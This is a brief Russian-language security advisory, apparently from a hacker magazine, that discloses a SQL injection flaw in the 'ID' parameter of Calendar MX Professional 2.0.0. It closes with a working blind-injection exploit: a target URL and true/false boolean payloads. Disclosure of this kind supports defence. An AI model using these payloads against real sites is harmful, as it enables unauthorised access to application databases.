Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Calendar MX Professional 2.0.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «ID» сценарием calendar_Eventupdate.asp.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://calendar.mxmania.net/calendar_Eventupdate.asp?ID={bL!ND}
True: calendar_Eventupdate.asp?ID=1 and 1=1
False: calendar_Eventupdate.asp?ID=1 and 1=2